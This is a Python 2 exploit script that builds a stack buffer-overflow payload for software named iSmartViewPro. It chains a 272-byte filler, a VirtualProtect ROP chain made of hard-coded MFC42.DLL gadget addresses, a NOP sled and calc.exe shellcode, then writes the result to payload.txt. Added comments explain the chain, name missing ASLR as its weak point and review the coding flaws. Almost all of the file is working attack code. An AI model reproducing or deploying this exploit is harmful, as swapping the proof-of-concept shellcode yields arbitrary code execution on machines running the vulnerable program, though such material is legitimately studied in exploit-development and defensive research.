#!/usr/bin/python
import struct
def p32(x):
    """Pack *x* as a 4-byte little-endian unsigned DWORD (the x86 stack word used for the chain below)."""
    dword = struct.Struct('<I')
    return dword.pack(x)
# 272-byte filler that precedes the ROP chain. The offset is specific to the
# targeted binary (presumably the distance to the saved return address --
# confirm against the crash analysis this script was derived from).
junk = "A" * 272

# ROP chain built entirely from MFC42.DLL v6.02.4131.0 gadgets. The gadget
# annotations below record "ASLR: False, Rebase: False": every address here is
# absolute, so the chain only works while that module loads at its fixed base.
# Defensively, that is the weak link -- mandatory ASLR / linking every loaded
# module with /DYNAMICBASE (or not shipping the non-ASLR MFC42 build) breaks
# each hard-coded address. The register setup ending in PUSHAD, together with
# the "ptr to kernel32.virtualprotect" and "lpOldProtect" annotations, looks
# like the usual mona.py-generated VirtualProtect chain that makes the stack
# page executable before control reaches the shellcode appended below.
# The negated constants (-0x40, -0x269) plus NEG EAX presumably exist so the
# chain itself contains none of the bad characters listed further down.
rop_chain = ""
rop_chain += p32(0x73db4802) # POP EDI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd49c8) # "retn" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73dce028) # POP ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd49c8) # "retn" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73dc3005) # POP EBP # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dc3005) # Skip 4 bytes from the stack
rop_chain += p32(0x73da3e02) # XOR EAX,EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d38a94) # PUSH EAX # ADD AL,5E # POP EBX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0xffffffc0) # -0x40 = 0xffffffc0 => EAX
rop_chain += p32(0x73d9d7e5) # NEG EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dbc1c8) # XCHG EAX,EDX # ADD DH,BH # PUSH ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dce028) # POP ESI # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d3b1cc) # "jmp [eax]" | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0xfffffd97) # -0x269 = 0xfffffd97 => EAX
rop_chain += p32(0x73d9d7e5) # NEG EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d38a94) # PUSH EAX # ADD AL,5E # POP EBX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d94a07) # POP ECX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x025fd0b0) # lpOldProtect
rop_chain += p32(0x73d5ed23) # POP EAX # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73dd62c8) # mfc42 (base + 0x000a62c8) : 0x7c801ad4 (ptr to kernel32.virtualprotect)
rop_chain += p32(0x73d8c36d) # PUSHAD # ADD AL,0 # RETN ** [MFC42.DLL] ** | {PAGE_EXECUTE_READ}
rop_chain += p32(0x73d92ecf) # jmp esp | {PAGE_EXECUTE_READ} [MFC42.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v6.02.4131.0

# Short NOP sled (10 x 0x90) sitting between the chain and the shellcode.
nops = "\x90" * 10
# Badchars: \x00\x0a\x0d
# Shellcode: calc.exe
# Proof-of-concept payload only -- per the comment above it launches calc.exe.
# None of the listed bad bytes appears in the escapes below.
shellcode = ""
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"

# Final buffer layout: filler | ROP chain | NOP sled | shellcode.
# NOTE(review): this file is Python 2 only -- `print` is a statement and
# struct.pack() returns str, which is why the concatenation works. Under
# Python 3 struct.pack() returns bytes and "str + bytes" raises TypeError.
payload = junk + rop_chain + nops + shellcode
print "[+] Creating iSmartViewPro payload of size " + str(len(payload)) + "."

# Write the buffer to payload.txt in the current directory.
# NOTE(review): the bare `except:` swallows every exception (including
# KeyboardInterrupt) and hides the real cause; `except IOError as e:` with the
# error printed is the narrower form, and a `with open(...)` block would
# guarantee the handle is closed even if write() fails. Text mode 'w' is only
# harmless here because 0x0a is excluded as a bad character; 'wb' would be the
# robust choice for raw bytes.
try:
    file = open('payload.txt','w');
    file.write(payload);
    file.close();
    print "[+] Payload created successfully."
except:
    print "[!] File cannot be created."